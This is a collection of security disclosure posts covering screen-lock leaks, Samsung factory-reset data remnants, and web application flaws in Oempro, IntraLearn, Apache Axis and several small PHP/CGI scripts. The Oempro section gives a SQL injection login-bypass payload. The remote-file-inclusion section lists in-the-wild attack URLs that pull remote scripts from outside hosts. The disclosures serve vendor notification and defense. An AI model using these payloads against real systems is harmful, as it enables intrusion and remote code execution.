Disclosure: e-MDs, Inc. Solution Series 7.2.1.634 Screen Lock Failure Information Disclosure

e-MDs, Inc. Solution Series integrated electronic health record and practice management software version 7.2.1.634 contains a flaw in the screen lock functionality. When a user locks the screen, under some circumstances, the screen will display the login box but fail to obscure any of the information displayed otherwise. As I discovered on March 21, 2014 at my doctor’s office, the screen not only displayed some of my information including name, account number, date of birth, phone number, and doctor notes, it also showed the same information for a second patient.

emds-solutions

Disclosure: Samsung Galaxy Phones Factory Reset Persistent Local Information Disclosure

A couple years back, I handed my Samsung Galaxy S1 down to a friend. When she got it she browsed the file system out of curiosity and noticed that it had retained private information; both from applications, as well as content I generated (e.g. pictures). While she promised to do a write-up of all the information left behind, she never did (flake!). This is obviously a problem for those who reset their phone thinking it is truly wiped clean, and then hand it off to a friend, sell it, or trade it in for credit.

The other day, a relative and I both upgraded our phones. Him from a Galaxy S2 to a S5, and me from a Galaxy S3 to a S5. So I figured why not check both out to see if they did the same. Cliff notes: The Samsung Galaxy S2 (model SGH-T989) ‘factory reset’ leaves a lot of personal information behind, while the Samsung Galaxy S3 (model SGH-T999) does not. It certainly does not delete your content.

Here is what I found left behind on the Galaxy S2. Directories for installed applications that did not get deleted, or deleted entirely:
\CamScanner
\foursquare
\gameloft
\Intsig
\Lazylist
\telenav
\data\flixster
\convertpad

files:
\telenav70\sdlogs\4\22\2014042208.txt
\telenav70\sdlogs\5\23\2014052320.txt
\Photo Editor\2014-03-30 19.11.22.jpg
(personal picture)
\lookout\log.txt
\Intsig\CamScanner\.log\log-2013-12-25_21-59-09.log
\DCIM\Camera
(55 personal pictures)
\contactBackup\contacts.csv
\contactBackup\contacts.pdf
(both contain full list of contacts: name and phone #. this is from an app that backed up contact info)
\Android\data\com.zynga.words\cache\FBImages
(three images, FB avatar pics of players)
\Android\data\com.facebook.katana\cache\.facebook_-372648771.jpg
(private image from FB)
\tmp_fsquare.jpg
\tmp_fsq
(a PNG thumbnail of avatar selected for the app)
tmp_fsquare

The Galaxy S3 (model SGH-T999) that I used pretty heavily, was much better after factory reset. I found the following left behind:

\Phone\Application\SMemo
(didn’t use this app despite installing it. files suggests private info may be available after reset)

All pictures, contact info, and information from applications is gone. So from the Galaxy S1 to the Galaxy S3, Samsung figured out the ‘Factory Wipe’ finally.

Screenshot_2014-07-03-20-26-56

Disclosure: Mr Number for Android Screenlock Bypass Concern

mrnumber

Mr. Number is an android app that allows you to do a variety of blocking for incoming communication. I’ve been using it for several months now and am quite happy. Crowd-sourced spam detection lets you know a new number is spam usually. When a call comes in that is suspected spam, a pop-up appears with the option to close it, block the call, etc.

mrnumber-01

If your screen is locked, it still pops up over the lock. Sometimes, but not always, if you block the number and tap ‘done’, it will drop you past the screenlock to the android desktop.

mrnumber-02

I haven’t been able to figure out what causes it to happen sometimes and not the other. I asked someone more familiar with Android and he couldn’t reproduce it reliably, but he did confirm the issue. The attack scenario is that if you spoof a call to a device using a known bad number, you could conceivably bypass the screen lock. Not very practical, especially since it isn’t reliable.

[Thanks to Zach @OSVDB for pointing out I failed by not including the affected version: 1.3.1]

Disclosure: Oempro Multiple Vulnerabilities

[This was originally published on OSVDB, now gone. VulnDB IDs 50321, 50322, 50323, 50324]

   Title:  Oempro Multiple Vulnerabilities

Release Date: 2008-12-01
Application: Octeth Technologies, Oempro 3.5.5.1
Cross Ref: CVE-2008-3057, CVE-2008-3058, CVE-2008-3059
OSVDB: 50321 .. 50324
Reference: http://osvdb.org/ref/50/oempro.txt

Description:

“What is Oempro? Newsletters, product release announcement emails, e-cards, happy birthday emails, email reminders, auto responders, simply all kind of emails can easily be generated and sent by Oempro with powerful and detailed reporting features.”

Oempro contains a wide variety of vulnerabilities and configuration weaknesses that may allow an attacker to gain full access to the product, manipulate user accounts and more. The version tested was discovered on a vulnerability assessment and is relatively outdated. Subsequent versions were not available for testing.

1 – Cookies not marked Secure / HttpOnly

The Oempro application uses a PHPSESSID cookie to maintain authentication between the client and server. The cookie is set without the ‘secure’ (RFC 2109) or ‘httponly’ flag. These flags help to ensure cookie information is sent over secure channels and the data is only used for authentication and help protect it from disclosure via cross-site scripting attacks.

HTTP/1.1 200 OK
Date: Tue, 01 Jul 2008 06:57:13 GMT
Server: Apache/2.0.59
Keep-Alive: timeout=604800, max=100
Connection: keep-alive, close
Set-Cookie: PHPSESSID=e3a335d15ac0be7f204d8e09ce83b5da; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6665
Content-Type: text/html; charset=UTF-8

-and-

HTTP/1.1 302 Found
Date: Wed, 02 Jul 2008 04:34:42 GMT
Server: Apache/2.0.59
Keep-Alive: timeout=604800, max=100
Connection: keep-alive, close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: oempcliremme[0]=
Set-Cookie: oempcliremme[1]=
Set-Cookie: oempcliremme[2]=
Set-Cookie: oempcliremme[3]=
Set-Cookie: oempcli=e3a335d15ac0be7f204d8e09ce83b5da
Location: ./bridge.php?GoToURL=
Content-Length: 0
Content-Type: text/html; charset=UTF-8

2 – index.php SQL Injection Authentication Bypass

The authentication mechanism suffers from a SQL injection vulnerability that allows an attacker to bypass authentication. The ‘FormValue_Email’ variable (“Email” field) does not properly sanitize user input. By supplying SQL syntax such as “‘ or 0=0 #”, an attacker will be logged in as an authenticated user. The structure of Oempro has several URLs that control the privilege of the account. Using this trick on /member/, /client/ and /admin/ will allow the attacker to authenticate as multiple accounts, including an administrator.

    Email:          ' or 0=0 #
    Password:       password

3 – /member/settings_account.php Cleartext Password Disclosure

Once authenticated, legitimately or via SQL injection as listed above, the application sends the user’s password in cleartext on the ‘Settings – Account Information’ tab (/member/settings_account.php). The password is stored in a hidden field (FormValue_Password) and obscured visibly with asterisks to the end user.

[Original PoC removed]

4 – /client/campaign_track.php FormValue_SearchKeywords Variable SQL Injection

The campaign tracking page (/client/campaign_track.php) does not properly filter user-supplied input, allowing for arbitrary SQL syntax to be passed to the database.

5 – Cross-frame Scripting

As described in CVE-2004-2383, the Oempro application does not implement code to prevent Cross-frame scripting attacks. This can be used to construct phishing attacks to more convincingly steal user credentials. While this is a browser based vulnerability, applications can add a small amount of script code to ensure the window is not loaded via a frame.

Product Details:

Vendor: Octeth Technologies
Product: Oempro
Version: 3.5.5.1

Solution:

Upgrade to version 4.

Disclosure Timeline:

2008-07-02: Vulnerability Discovered
2008-07-05: Disclosed to Vendor via [sales|press|security]@octeth.com
2008-07-05: security@ invalid. Sales #HZS-628697 opened automatically.
2008-07-07: CVE numbers assigned
2008-07-14: Vendor Acknowledgement from C.H.
2008-09-16: v4, said to fix issues, still not released
2008-10-05: Mail sent to C.H. asking for V4 release ETA
2008-11-22: v4 released, reportedly addresses issues
2008-12-01: Public Disclosure

CVE:

This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems. The CVE initiative has assigned CVE Candidate CVE-2008-3057 (cookie handling), CVE-2008-3058 (sql injection) and CVE-2008-3059 (password disclosure) to this issue.

References:

OSVDB: http://osvdb.org/50321 .. 50324
Vendor: http://octeth.com/products/oempro/
XSS Information: http://en.wikipedia.org/wiki/Cross_site_scripting
HttpOnly Cookie XSS Mitigation: http://msdn.microsoft.com/en-us/library/ms533046(VS.85).aspx

Disclosure: Multiple Software Remote File Inclusion

[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]

Quick searches didn’t find these in OSVDB. I haven’t had time to check the
other VDBs.

/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn

/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??

/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f

/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f

/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??

/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??

/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???

Disclosure: IntraLearn 2.1 Multiple Vulnerabilities

http://www.intralearn.com/

1) Cross-site Scripting (XSS)

URL Variables
/library/description_link.cfm outline, course
/library/courses_catalog.cfm records_to_display, the_start

2) Login Information Cached In Memory

The login POST requests for the IntraLearn returns a 200 OK HTTP response code. As long as the browser window is not closed, it is possible for someone to use the browsers “Back” button until the page after the login page is reached. At this point, the browser will prompt the user to re-post the data to the server. This
data, the username and password, is pulled from memory and resubmitted to the server. The user will then be authenticated to the IntraLearn application.

3) IntraLearn Physical Path Disclosure

Several pages of the IntraLearn web application disclose the physical path of the software installation. By making a direct request to one of several pages, the application wll cause an error message that discloses the information.

/help/1/Instructor/Knowledge_Impact_Course.htm
/help/1/Instructor/LRN-formatted_Course.htm
/help/1/Instructor/Create_Course.htm

2008-02-17 support@intralearn.com contacted
2008-02-21 reply from P.D. @intralearn received; 2.1 is outdated, up to 4.2.3 or 5.1 (soon) to fix
2008-03-15 disclosed

Disclosure: Apache Axis Nonexistent Java Web Service Remote Path Disclosure

[This was originally disclosed on the VIM mail list. VulnDB ID 34154]

Watchfire’s Appscan product looks for this vulnerability (not sure what they officially title it, the title above is my own), but I can’t find any reference to it. Google finds a lot of indirect references suggesting it is common knowledge to the folks who use the product. Has anyone seen this before or have a reference?


Requesting this URL will generate the error message:

http://%5Btarget%5D/axis/tt_pm4l.jws?wsdl

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault – java.io.FileNotFoundException:
c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)

AxisFault
faultCode: {http://xml.apache.org/axis/}Server.userException
faultString: java.io.FileNotFoundException:
c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)
faultActor: null
faultDetail:
stackTrace: java.io.FileNotFoundException:
c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)

[SNIP]

Disclosure: Annuaire (Directory) Multiple Vulnerabilities

[This was originally published on OSVDB, now gone. VulnDB IDs 24302, 24303]

Comment left on feedback page:
http://www.brunox.org/modules.php?op=modload&name=FeedBack&file=index

While testing your demo of Annuaire (Directory), I noticed a few security vulnerabilities:

Many pages are calling /include/lang-en.php which is showing the full installation path. Additionally, directly requesting this script will reveal the full path.

inscription.php The comment field (COMMENTAIRE variable) allows for cross-site scripting (XSS) attacks.

Thanks

Brian

Disclosure: ARIA (Accounting Receiving and Inventory Administration) genmessage.php Message Field XSS

[This was originally published on OSVDB, now gone. VulnDB ID 24255]

From: security curmudgeon
To: jflechtner[at]users.sourceforge.net
Date: Tue, 28 Mar 2006 11:25:02 -0500 (EST)
Subject: ARIA security issue

Hey Josh,

Not sure if you are still maintaining this project, but while playing with the demo I noticed a small security issue. The genmessage.php script doesn’t sanitize user input submitted to the Message Field (message variable) allowing for cross-site scripting (XSS) attacks. I didn’t test the other scripts so this may occur in other scripts.

Thanks,

Brian

Disclosure: @1 Event Publisher / @1 Table Publisher Multiple Vulnerabilities

[This was originally published on OSVDB, now gone. VulnDB 24235, 24236, 24237, 24238]

  • Ticket has been submitted. The ticket number is SCR00994.

While looking at some of your scripts, I noticed there are a few security issues:

UPOINT @1 Event Publisher
eventpublisher_admin.htm does not validate input to the Event, Description, Time, Website, and Public Remarks fields. This can be used for cross-site scripting (XSS) attacks.

eventpublisher_usersubmit.htm does not validate input to the Event, Description, Time, Website, and Public Remarks fields. This can be used for cross-site scripting (XSS) attacks.

A direct request to eventpublisher.txt will reveal the contents of private comments

UPOINT @1 Table Publisher
tablepublisher.cgi does not validate input to the Title of Table field, which can be used for XSS attacks.

Thanks